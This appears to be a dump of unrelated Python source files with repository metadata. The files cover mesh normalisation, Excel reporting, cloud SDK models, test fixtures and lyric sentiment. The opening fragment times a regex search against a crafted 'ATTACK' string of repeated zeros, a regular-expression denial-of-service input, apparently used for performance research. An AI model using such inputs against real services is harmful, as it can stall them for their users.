ATTACK = "" + "0" * i * 10000 + "!1 _SLQ_1"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *10000}: took {DURATION} seconds!") | [
"liyt@ios.ac.cn"
] | liyt@ios.ac.cn |
0542df0613cdfe3e156d53aa7c489a965abbc72e | 3121b64e95d022b12585348070dff048ae879f68 | /render/normalised_ply.py | 39726f5e431102d53b395b35aa7b40c26fb8c952 | [
"MIT"
] | permissive | lt6253090/OcCo | 082d1e5371064c70f9185d9425ea4318539c1785 | 5936a6fe099fe0b5aa5da47e8ba828a72b3adcbf | refs/heads/master | 2022-11-26T14:19:17.070920 | 2020-08-03T13:52:21 | 2020-08-03T13:52:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | # Copyright (c) 2020. Hanchen Wang, hw501@cam.ac.uk
import os, open3d, numpy as np
File_ = open('ModelNet_flist_short.txt', 'w')
if __name__ == "__main__":
root_dir = "../data/ModelNet_subset/"
for root, dirs, files in os.walk(root_dir, topdown=False):
for file in files:
if '.ply' in file:
amesh = open3d.io.read_triangle_mesh(os.path.join(root, file))
out_file_name = os.path.join(root, file).replace('.ply', '_normalised.obj')
center = amesh.get_center()
amesh.translate(-center)
maxR = (np.asarray(amesh.vertices)**2).sum(axis=1).max()**(1/2)
# we found divided by (2*maxR) has best rendered visualisation results
amesh.scale(1/(2*maxR))
open3d.io.write_triangle_mesh(out_file_name, amesh)
File_.writelines(out_file_name.replace('.obj', '').replace(root_dir, '') + '\n')
print(out_file_name)
| [
"hc.wang96@gmail.com"
] | hc.wang96@gmail.com |
10eb4d49285661fe5c622e13b644168cca0601b2 | 56ca0c81e6f8f984737f57c43ad8d44a84f0e6cf | /src/ewaluacja2021/xlsy.py | 4dfb33df91b55d730ce55579e99c89234071e548 | [
"MIT"
] | permissive | iplweb/bpp | c40f64c78c0da9f21c1bd5cf35d56274a491f840 | a3d36a8d76733a479e6b580ba6ea57034574e14a | refs/heads/dev | 2023-08-09T22:10:49.509079 | 2023-07-25T04:55:54 | 2023-07-25T04:55:54 | 87,017,024 | 2 | 0 | NOASSERTION | 2023-03-04T04:02:36 | 2017-04-02T21:22:20 | Python | UTF-8 | Python | false | false | 7,162 | py | import os
from decimal import Decimal
import openpyxl
from django.db.models import Sum, Value
from ewaluacja2021.const import LATA_2017_2018, LATA_2019_2021
from ewaluacja2021.reports import get_data_for_report, write_data_to_report
from ewaluacja2021.util import autor2fn, output_table_to_xlsx
from bpp.models import Autor
class WyjsciowyXLSX:
def __init__(self, title, rekordy, dane, katalog_wyjsciowy):
self.title = title
self.rekordy = rekordy
self.dane = dane
self.katalog_wyjsciowy = katalog_wyjsciowy
self.create_workbook()
def create_workbook(self):
self.wb = openpyxl.Workbook()
def initialize_worksheet(self):
self.ws = self.wb.active
if self.title:
self.ws.title = self.title[:31]
def tabelka(self):
write_data_to_report(self.ws, get_data_for_report(self.rekordy))
def get_output_name(self):
return f"{self.title}.xlsx"
def zapisz(self):
self.wb.save(os.path.join(self.katalog_wyjsciowy, self.get_output_name()))
def metka(self):
raise NotImplementedError()
def zrob(self):
self.initialize_worksheet()
self.metka()
self.ws.append([])
self.tabelka()
self.zapisz()
class CalosciowyXLSX(WyjsciowyXLSX):
def metka(self):
self.ws.append(
[
"Parametry raportu 3N",
"raport całościowy",
]
)
self.ws.append(["Stan na dzień/moment", self.dane["ostatnia_zmiana"]])
self.ws.append(["Dyscyplina", self.dane["dyscyplina"]])
self.ws.append(["Liczba N", self.dane["liczba_n"]])
self.ws.append(["Liczba 0.8N", self.dane["liczba_0_8_n"]])
self.ws.append(["Liczba 2.2N", self.dane["liczba_2_2_n"]])
self.ws.append(["Liczba 3*N", Decimal("3.0") * self.dane["liczba_n"]])
self.ws.append(
[
"Suma slotów za lata 2017-2018",
self.dane["sumy_slotow"][LATA_2017_2018],
]
)
self.ws.append(
[
"Suma slotów za lata 2019-2021",
self.dane["sumy_slotow"][LATA_2019_2021],
]
)
sumy = self.rekordy.filter(do_ewaluacji=True).aggregate(
suma_slot=Sum("slot"), suma_pkdaut=Sum("pkdaut")
)
self.ws.append(["Zebrana suma slotów za wszystkie prace", sumy["suma_slot"]])
self.ws.append(["Zebrana suma PKDAut za wszystkie prace", sumy["suma_pkdaut"]])
class WypelnienieXLSX(CalosciowyXLSX):
def get_data_for_report(self):
id_autorow = self.rekordy.values_list("autor_id", flat=True).distinct()
for autor in Autor.objects.filter(pk__in=id_autorow):
maks_pkt_aut_calosc = self.dane["maks_pkt_aut_calosc"].get(str(autor.pk))
maks_pkt_aut_monografie = self.dane["maks_pkt_aut_monografie"].get(
str(autor.pk)
)
sumy = self.rekordy.filter(do_ewaluacji=True, autor_id=autor.pk).aggregate(
suma_slot=Sum("slot"),
suma_pkdaut=Sum("pkdaut"),
)
sumy_monografie = self.rekordy.filter(
do_ewaluacji=True, monografia=Value("t"), autor_id=autor.pk
).aggregate(
suma_slot=Sum("slot"),
)
sumy_wszystkie = self.rekordy.filter(autor_id=autor.pk).aggregate(
suma_pkdaut=Sum("pkdaut"),
)
yield [
str(autor.id),
autor.nazwisko + " " + autor.imiona,
maks_pkt_aut_calosc,
sumy["suma_slot"] or 0,
(sumy["suma_slot"] or 0) / maks_pkt_aut_calosc,
maks_pkt_aut_monografie,
(sumy_monografie["suma_slot"] or 0),
(sumy_monografie["suma_slot"] or 0) / maks_pkt_aut_calosc,
sumy["suma_pkdaut"],
sumy_wszystkie["suma_pkdaut"],
(sumy["suma_pkdaut"] or 0) / (sumy_wszystkie["suma_pkdaut"] or 1),
]
def write_data_to_report(self, ws: openpyxl.worksheet.worksheet.Worksheet, data):
output_table_to_xlsx(
ws,
"Przeszly",
[
# "ID elementu",
"ID autora",
"Nazwisko i imię",
#
"Maksymalna suma udziałów",
"Sprawozdana suma udziałów",
"Procent sprawozdanej sumy udziałów",
#
"Maksymalna suma udziałów - monografie",
"Sprawozdana suma udziałów - monografie",
"Procent sprawozdanej sumy udziałów - monografie",
#
"PKDaut prac sprawozdanych",
"PKDaut wszystkich prac",
"Procent PKDaut sprawozdanych",
],
data,
first_column_url="https://{site_name}/bpp/autor/",
column_widths={
"A": 10,
"B": 14,
"C": 14,
"D": 14,
"E": 14,
"F": 14,
"G": 14,
"H": 14,
"I": 14,
"J": 14,
"K": 14,
"L": 14,
},
autor_column_url=1,
)
def tabelka(self):
dane = self.get_data_for_report()
self.write_data_to_report(self.ws, dane)
class AutorskiXLSX(WyjsciowyXLSX):
def __init__(self, autor, title, rekordy, dane, katalog_wyjsciowy):
super().__init__(
title=title, rekordy=rekordy, dane=dane, katalog_wyjsciowy=katalog_wyjsciowy
)
self.autor = autor
def metka(self):
self.ws.append(
[
"Parametry raportu 3N",
"wyciąg dla pojedynczego autora",
]
)
self.ws.append(["Stan na dzień/moment", self.dane["ostatnia_zmiana"]])
self.ws.append(["Dyscyplina", self.dane["dyscyplina"]])
self.ws.append(
[
"Maks. suma slotów za wszytkie prace",
self.dane["maks_pkt_aut_calosc"].get(str(self.autor.pk)),
]
)
sumy = self.rekordy.filter(do_ewaluacji=True).aggregate(
suma_slot=Sum("slot"), suma_pkdaut=Sum("pkdaut")
)
self.ws.append(["Zebrana suma slotów za wszystkie prace", sumy["suma_slot"]])
self.ws.append(["Zebrana suma PKDAut za wszystkie prace", sumy["suma_pkdaut"]])
self.ws.append(
[
"Maks. suma slotów za monografie",
self.dane["maks_pkt_aut_monografie"].get(str(self.autor.pk)),
]
)
sumy = self.rekordy.filter(do_ewaluacji=True, monografia=Value("t")).aggregate(
suma_slot=Sum("slot"), suma_pkdaut=Sum("pkdaut")
)
self.ws.append(["Zebrana suma slotów za monografie", sumy["suma_slot"]])
self.ws.append(["Zebrana suma PKDAut za monografie", sumy["suma_pkdaut"]])
def get_output_name(self):
return autor2fn(self.autor) + ".xlsx"
| [
"michal.dtz@gmail.com"
] | michal.dtz@gmail.com |
e9b067b88c153881f73dfe6f385f65c0b6b2d567 | c34380b64145b4ce26df9b27c34139d08de27515 | /findSquare_1.py | 6691dfa3d4ddfc6a058b6d9f149dcc8a10a5ef7b | [] | no_license | codeandrew/python-algorithms | 531bc1574700cb7d822904f1e1ead9a596a85d29 | c71b0941f14825fcaa3fbb1429365ca1f28a3018 | refs/heads/master | 2023-04-28T23:56:01.283434 | 2023-04-05T03:06:22 | 2023-04-05T03:06:22 | 169,078,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | import math
def is_square(n):
if n == 0 : return True
try :
root = math.sqrt(n)
return True if n % root == 0 else False
except :
return False
| [
"jeanandrewfuentes@gmail.com"
] | jeanandrewfuentes@gmail.com |
47f5d7568c984524b2c898478013521badca8f55 | e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67 | /azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2016_09_01/models/frontend_ip_configuration.py | 29047c8dab7e49461129f986c35db4e775edb14a | [] | no_license | EnjoyLifeFund/macHighSierra-cellars | 59051e496ed0e68d14e0d5d91367a2c92c95e1fb | 49a477d42f081e52f4c5bdd39535156a2df52d09 | refs/heads/master | 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null | UTF-8 | Python | false | false | 4,730 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class FrontendIPConfiguration(SubResource):
"""Frontend IP address of the load balancer.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar inbound_nat_rules: Read only. Inbound rules URIs that use this
frontend IP.
:vartype inbound_nat_rules: list of :class:`SubResource
<azure.mgmt.network.v2016_09_01.models.SubResource>`
:ivar inbound_nat_pools: Read only. Inbound pools URIs that use this
frontend IP.
:vartype inbound_nat_pools: list of :class:`SubResource
<azure.mgmt.network.v2016_09_01.models.SubResource>`
:ivar outbound_nat_rules: Read only. Outbound rules URIs that use this
frontend IP.
:vartype outbound_nat_rules: list of :class:`SubResource
<azure.mgmt.network.v2016_09_01.models.SubResource>`
:ivar load_balancing_rules: Gets load balancing rules URIs that use this
frontend IP.
:vartype load_balancing_rules: list of :class:`SubResource
<azure.mgmt.network.v2016_09_01.models.SubResource>`
:param private_ip_address: The private IP address of the IP configuration.
:type private_ip_address: str
:param private_ip_allocation_method: The Private IP allocation method.
Possible values are: 'Static' and 'Dynamic'. Possible values include:
'Static', 'Dynamic'
:type private_ip_allocation_method: str or :class:`IPAllocationMethod
<azure.mgmt.network.v2016_09_01.models.IPAllocationMethod>`
:param subnet: The reference of the subnet resource.
:type subnet: :class:`Subnet
<azure.mgmt.network.v2016_09_01.models.Subnet>`
:param public_ip_address: The reference of the Public IP resource.
:type public_ip_address: :class:`PublicIPAddress
<azure.mgmt.network.v2016_09_01.models.PublicIPAddress>`
:param provisioning_state: Gets the provisioning state of the public IP
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: The name of the resource that is unique within a resource
group. This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_validation = {
'inbound_nat_rules': {'readonly': True},
'inbound_nat_pools': {'readonly': True},
'outbound_nat_rules': {'readonly': True},
'load_balancing_rules': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'inbound_nat_rules': {'key': 'properties.inboundNatRules', 'type': '[SubResource]'},
'inbound_nat_pools': {'key': 'properties.inboundNatPools', 'type': '[SubResource]'},
'outbound_nat_rules': {'key': 'properties.outboundNatRules', 'type': '[SubResource]'},
'load_balancing_rules': {'key': 'properties.loadBalancingRules', 'type': '[SubResource]'},
'private_ip_address': {'key': 'properties.privateIPAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'properties.privateIPAllocationMethod', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'Subnet'},
'public_ip_address': {'key': 'properties.publicIPAddress', 'type': 'PublicIPAddress'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, private_ip_address=None, private_ip_allocation_method=None, subnet=None, public_ip_address=None, provisioning_state=None, name=None, etag=None):
super(FrontendIPConfiguration, self).__init__(id=id)
self.inbound_nat_rules = None
self.inbound_nat_pools = None
self.outbound_nat_rules = None
self.load_balancing_rules = None
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.public_ip_address = public_ip_address
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
| [
"Raliclo@gmail.com"
] | Raliclo@gmail.com |
b30cf9c3fdd4d322be96bee80da321a1ad93e8f1 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_Fisher/trend_MovingMedian/cycle_5/ar_/test_artificial_32_Fisher_MovingMedian_5__0.py | 9e5e9d5395d5905e2f44be0c8fe90fe178f72318 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 267 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "MovingMedian", cycle_length = 5, transform = "Fisher", sigma = 0.0, exog_count = 0, ar_order = 0); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
eb5df28853640bcb013ac32bdbc48d0220d3c72f | 56ba30f470ddf70d7705d847c0ab2f5f894739e7 | /_src/stage3/break_time.py | 854072eda0ac8a1499473b04f35fc3560197a767 | [] | no_license | chhikara0007/intro-to-programming | c989fd5892ed3fcb4c559e278a72a2d931e7c9e3 | 6a93f43c225b146c6874ee7821c25e1f61f821b0 | refs/heads/master | 2021-01-02T08:13:07.238853 | 2016-10-04T14:44:36 | 2016-10-04T14:44:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | import time
import webbrowser
import random
total_breaks = 3
break_count = 0
web_list = ["http://www.google.com", "http://twitter.com",
"http://www.youtube.com/watch?v=dQw4w9WgXcQ"]
print("This program started on "+time.ctime())
while(break_count < total_breaks):
time.sleep(5)
web = random.choice(web_list)
webbrowser.open(web)
break_count = break_count + 1 | [
"dadac123@gmail.com"
] | dadac123@gmail.com |
1679dfc05c5e136eb693e371474a8d6c679e4eb8 | 46732d613208ee4096fbbd3fd74f22146471d1ce | /wangyiyun_songs&lyrics/all_singer歌手情绪分析/陈粒/sentiments_test.py | 0eaf219349b004a76550efc38b24981a66396e3d | [] | no_license | cassieeric/python_crawler | 7cb02f612382801ae024e2cee70e0c2bcdba927c | 6d2b4db3d34183d729f6fd30555c6d6f04514260 | refs/heads/master | 2022-11-30T20:30:50.031960 | 2022-11-27T02:53:22 | 2022-11-27T02:53:22 | 118,204,154 | 322 | 283 | null | 2022-12-21T09:33:08 | 2018-01-20T03:17:14 | HTML | UTF-8 | Python | false | false | 867 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from snownlp import SnowNLP
# 积极/消极
# print(s.sentiments) # 0.9769551298267365 positive的概率
def get_word():
with open("陈粒歌词关键字.txt") as f:
line = f.readline()
word_list = []
while line:
line = f.readline()
word_list.append(line.strip('\r\n'))
f.close()
return word_list
def get_sentiment(word):
text = u'{}'.format(word)
s = SnowNLP(text)
print(s.sentiments)
if __name__ == '__main__':
words = get_word()
for word in words:
get_sentiment(word)
# text = u'''
# 也许
# '''
# s = SnowNLP(text)
# print(s.sentiments)
# with open('lyric_sentiments.txt', 'a', encoding='utf-8') as fp:
# fp.write(str(s.sentiments)+'\n')
# print('happy end')
| [
"noreply@github.com"
] | cassieeric.noreply@github.com |
d47e989a1e6cd0df97c8b0b1cff955d999fdb136 | abfff8ab3162f7003b51d3fdcc7897684d2d4e54 | /unicode.py | 1562ddfe3bc2f669b166f9b3b02d019d3f409711 | [] | no_license | RedKnite5/Junk | 972dc24c99fe30400ab35e77bb4b69abe9076190 | 93b5bb4b6138518724528770cf56ea1df10e95b4 | refs/heads/master | 2023-04-10T07:25:14.968070 | 2023-04-04T04:19:42 | 2023-04-04T04:19:42 | 143,909,118 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | import io
with io.open("unicode.txt", "w+", encoding="utf8") as file:
for i in range(32, 127):
file.write(chr(i))
for i in range(161, 130_000):
try:
file.write(chr(i))
except UnicodeEncodeError:
pass
| [
"mr.awesome10000@gmail.com"
] | mr.awesome10000@gmail.com |
71511da2fd63661ffd2addee0f4b082d184b1312 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/cloudsign/apis/SaveMultiEvidenceRequest.py | bb03fd81acfbacb5edb45efe9f8045287987e3a4 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 2,364 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class SaveMultiEvidenceRequest(JDCloudRequest):
"""
多证据链存证接口
"""
def __init__(self, parameters, header=None, version="v1"):
super(SaveMultiEvidenceRequest, self).__init__(
'/evidence:evidenceMultisave', 'POST', header, version)
self.parameters = parameters
class SaveMultiEvidenceParameters(object):
def __init__(self,businessId, file, ):
"""
:param businessId: 业务流水号
:param file: 存证数据json字符串的Base64
"""
self.businessId = businessId
self.file = file
self.businessCode = None
self.lender = None
self.messageId = None
self.evidenceType = None
self.messageDate = None
def setBusinessCode(self, businessCode):
"""
:param businessCode: (Optional) 证据链代码
"""
self.businessCode = businessCode
def setLender(self, lender):
"""
:param lender: (Optional) 资方信息(借钱传:ZY;票据传 PJ_SHOUXIN--授信,PJ_JIEKUAN--借款)
"""
self.lender = lender
def setMessageId(self, messageId):
"""
:param messageId: (Optional) 请求流水号
"""
self.messageId = messageId
def setEvidenceType(self, evidenceType):
"""
:param evidenceType: (Optional) 业务类型(JIEQIAN–借钱;PIAOJU--票据)
"""
self.evidenceType = evidenceType
def setMessageDate(self, messageDate):
"""
:param messageDate: (Optional) 请求时间
"""
self.messageDate = messageDate
| [
"jdcloud-api@jd.com"
] | jdcloud-api@jd.com |
763df4380182d72f1502e248f2df77a2e82f2563 | 69eb40f099dcc0ea326972ff63db1d4fd131641a | /test_upkern/test_fixtures/test_sources.py | 29cb9c77be4569f6d5831cd4e236626b66b79ad1 | [] | no_license | alunduil/upkern | 4bcc1485629fad8a0ab1c613f71b7ebc3ef9038e | 23d4a98077bc18a229425a3f53dedd89ef5356fd | refs/heads/master | 2021-01-21T00:18:03.646111 | 2014-01-15T03:06:53 | 2014-01-15T03:06:53 | 1,007,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,481 | py | # Copyright (C) 2014 by Alex Brandt <alunduil@alunduil.com>
#
# upkern is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
SOURCES = {}
SOURCES['correct'] = []
SOURCES['correct'].append(
{
'name': None,
'directory_name': 'linux-3.12.6-gentoo',
'package_name': '=sys-kernel/gentoo-sources-3.12.6',
'binary_name': 'bzImage-3.12.6-gentoo',
'configuration_name': 'config-3.12.6-gentoo',
'system_map_name': 'System.map-3.12.6-gentoo',
'kernel_index': 3012006000,
'kernel_suffix': '-3.12.6-gentoo',
'portage_configuration': { 'MAKEOPTS': '-j5' },
'source_directories': [
'linux-3.12.6-gentoo',
'linux-3.12.5-gentoo',
'linux-3.10.7-gentoo',
],
'configuration_files': [
'config-3.12.6-gentoo',
'config-3.12.5-gentoo',
'config-3.10.7-gentoo',
],
'package_names': [
'sys-kernel/gentoo-sources-3.12.6',
'sys-kernel/gentoo-sources-3.12.5',
'sys-kernel/gentoo-sources-3.10.7',
],
})
SOURCES['correct'].append(
{
'name': 'sys-kernel/gentoo-sources-3.12.6',
'directory_name': 'linux-3.12.6-gentoo',
'package_name': '=sys-kernel/gentoo-sources-3.12.6',
'binary_name': 'bzImage-3.12.6-gentoo',
'configuration_name': 'config-3.12.6-gentoo',
'system_map_name': 'System.map-3.12.6-gentoo',
'kernel_index': 3012006000,
'kernel_suffix': '-3.12.6-gentoo',
'portage_configuration': { 'MAKEOPTS': '-j5' },
'source_directories': [
'linux-3.12.6-gentoo',
'linux-3.12.5-gentoo',
'linux-3.10.7-gentoo',
],
'configuration_files': [
'config-3.12.6-gentoo',
'config-3.12.5-gentoo',
'config-3.10.7-gentoo',
],
'package_names': [
'sys-kernel/gentoo-sources-3.12.6',
'sys-kernel/gentoo-sources-3.12.5',
'sys-kernel/gentoo-sources-3.10.7',
],
})
SOURCES['correct'].append(
{
'name': 'gentoo-sources-3.9.11-r1',
'directory_name': 'linux-3.9.11-gentoo-r1',
'package_name': '=sys-kernel/gentoo-sources-3.9.11-r1',
'binary_name': 'bzImage-3.9.11-gentoo-r1',
'configuration_name': 'config-3.9.11-gentoo-r1',
'system_map_name': 'System.map-3.9.11-gentoo-r1',
'kernel_index': 3009011001,
'kernel_suffix': '-3.9.11-gentoo-r1',
'portage_configuration': { 'MAKEOPTS': '-j5' },
'source_directories': [
'linux-3.12.6-gentoo',
'linux-3.12.5-gentoo',
'linux-3.10.7-gentoo',
'linux-3.9.11-gentoo-r1',
],
'configuration_files': [
'config-3.12.6-gentoo',
'config-3.12.5-gentoo',
'config-3.10.7-gentoo',
'config-3.9.11-gentoo-r1',
],
'package_names': [
'sys-kernel/gentoo-sources-3.12.6',
'sys-kernel/gentoo-sources-3.12.5',
'sys-kernel/gentoo-sources-3.10.7',
'sys-kernel/gentoo-sources-3.9.11-r1',
],
})
SOURCES['correct'].append(
{
'name': 'hardened-sources-3.11.7-r1',
'directory_name': 'linux-3.11.7-hardened-r1',
'package_name': '=sys-kernel/hardened-sources-3.11.7-r1',
'binary_name': 'bzImage-3.11.7-hardened-r1',
'configuration_name': 'config-3.11.7-hardened-r1',
'system_map_name': 'System.map-3.11.7-hardened-r1',
'kernel_index': 3011007001,
'kernel_suffix': '-3.11.7-hardened-r1',
'portage_configuration': { 'MAKEOPTS': '-j5' },
'source_directories': [
'linux-3.12.6-gentoo',
'linux-3.12.5-gentoo',
'linux-3.11.7-hardened-r1',
'linux-3.10.7-gentoo',
],
'configuration_files': [
'config-3.12.6-gentoo',
'config-3.12.5-gentoo',
'config-3.11.7-hardened-r1',
'config-3.10.7-gentoo',
],
'package_names': [
'sys-kernel/gentoo-sources-3.12.6',
'sys-kernel/gentoo-sources-3.12.5',
'sys-kernel/hardened-sources-3.11.7-r1',
'sys-kernel/gentoo-sources-3.10.7',
],
})
SOURCES['all'] = []
SOURCES['all'].extend(SOURCES['correct'])
| [
"alunduil@alunduil.com"
] | alunduil@alunduil.com |
3c55cf6714a04191758570aa165a7e286c861126 | 810ce1c1ac47743e253171ec7541c0e431d952c2 | /cosmic_py/tests/e2e/test_api.py | fc3d0125e3dc13ef34cb093cbd65112a7627ab15 | [] | no_license | hjlarry/practise-py | 91052c25dc7ab706c6234f6d657db76667a27124 | 871e06b9652d356f55e3888f1f7ea180ac2b1954 | refs/heads/master | 2022-09-11T17:47:48.557194 | 2022-08-10T02:07:24 | 2022-08-10T02:07:24 | 136,263,989 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import pytest
import requests
import config
from . import api_client
from ..random_refs import random_sku, random_batchref, random_orderid
@pytest.mark.usefixtures("postgres_db")
@pytest.mark.usefixtures("restart_api")
def test_happy_path_returns_201_and_allocated_batch():
orderid = random_orderid()
sku, othersku = random_sku(), random_sku("other")
earlybatch = random_batchref(1)
laterbatch = random_batchref(2)
otherbatch = random_batchref(3)
api_client.post_to_add_batch(laterbatch, sku, 100, "2011-01-02")
api_client.post_to_add_batch(earlybatch, sku, 100, "2011-01-01")
api_client.post_to_add_batch(otherbatch, othersku, 100, None)
r = api_client.post_to_allocate(orderid, sku, qty=3)
assert r.status_code == 202
r = api_client.get_allocation(orderid)
assert r.ok
assert r.json() == [
{"sku": sku, "batchref": earlybatch},
]
@pytest.mark.usefixtures("postgres_db")
@pytest.mark.usefixtures("restart_api")
def test_unhappy_path_returns_400_and_error_message():
unknown_sku, orderid = random_sku(), random_orderid()
r = api_client.post_to_allocate(orderid, unknown_sku, qty=20, expect_success=False)
assert r.status_code == 400
assert r.json()["message"] == f"Invalid sku {unknown_sku}"
r = api_client.get_allocation(orderid)
assert r.status_code == 404
| [
"hjlarry@163.com"
] | hjlarry@163.com |
7865b6100d53f377cfe311ef52f4b4f3c2c25d79 | 53639eec5ac26184132bf16ce8c5bc428ae884a4 | /rcsb/utils/tests-chem/testOeSearchIndexFpScores.py | 13983f50cb160535b84ea4287576726d1fee83e0 | [
"Apache-2.0"
] | permissive | rcsb/py-rcsb_utils_chem | df4bcd5d40a9c61d9440e5f72f3077c7192bfa7d | 3d1a1ffc63cbcfcd43e69a58fd7eada17780e636 | refs/heads/master | 2023-06-12T07:07:55.151599 | 2023-05-22T13:35:27 | 2023-05-22T13:35:27 | 212,129,928 | 0 | 3 | Apache-2.0 | 2023-05-22T13:35:28 | 2019-10-01T15:20:58 | Python | UTF-8 | Python | false | false | 16,081 | py | ##
# File: OeSearchIndexUtilsTests.py
# Author: J. Westbrook
# Date: 1-Oct-2019
# Version: 0.001
#
# Update:
#
#
##
"""
Tests for search modes using source molecular definitions coming from a search index.
"""
__docformat__ = "restructuredtext en"
__author__ = "John Westbrook"
__email__ = "jwest@rcsb.rutgers.edu"
__license__ = "Apache 2.0"
import logging
import os
import platform
import resource
import time
import unittest
from rcsb.utils.chem import __version__
from rcsb.utils.chem.ChemCompIndexProvider import ChemCompIndexProvider
from rcsb.utils.chem.FailList import FailList
from rcsb.utils.chem.OeDepictAlign import OeDepictMCSAlignPage
from rcsb.utils.chem.OeIoUtils import OeIoUtils
from rcsb.utils.chem.OeSearchMoleculeProvider import OeSearchMoleculeProvider
from rcsb.utils.chem.OeSearchUtils import OeSearchUtils
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(os.path.dirname(HERE)))
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class OeSearchIndexUtilsTests(unittest.TestCase):
skipFlag = True
def setUp(self):
self.__workPath = os.path.join(HERE, "test-output")
self.__dataPath = os.path.join(HERE, "test-data")
self.__cachePath = os.path.join(HERE, "test-output")
self.__ccUrlTarget = os.path.join(self.__dataPath, "components-abbrev.cif")
self.__birdUrlTarget = os.path.join(self.__dataPath, "prdcc-abbrev.cif")
# self.__fpTypeList = ["TREE", "PATH", "MACCS", "CIRCULAR", "LINGO"]
self.__fpTypeCuttoffList = [("TREE", 0.6), ("PATH", 0.6), ("MACCS", 0.9), ("CIRCULAR", 0.6), ("LINGO", 0.9)]
self.__screenType = "SMARTS"
self.__numProc = 1
self.__minCount = 500
self.__startTime = time.time()
#
# self.__buildTypeList = ["oe-iso-smiles", "oe-smiles", "acdlabs-smiles", "cactvs-iso-smiles", "cactvs-smiles", "inchi"]
self.__buildTypeList = ["oe-iso-smiles", "oe-smiles", "cactvs-iso-smiles", "cactvs-smiles", "inchi"]
self.__numMols = 3000
self.__myKwargs = {
"cachePath": self.__cachePath,
"useCache": True,
"ccFileNamePrefix": "cc-abbrev",
"oeFileNamePrefix": "oe-abbrev",
"limitPerceptions": False,
"minCount": 500,
"maxFpResults": 50,
"fpTypeCuttoffList": self.__fpTypeCuttoffList,
"buildTypeList": self.__buildTypeList,
}
#
fL = FailList()
self.__failedIdList = sorted(set(fL.getFailedList()))
logger.info("Using failed count %d", len(self.__failedIdList))
logger.debug("Running tests on version %s", __version__)
logger.info("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))
def tearDown(self):
unitS = "MB" if platform.system() == "Darwin" else "GB"
rusageMax = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
logger.info("Maximum resident memory size %.4f %s", rusageMax / 10 ** 6, unitS)
endTime = time.time()
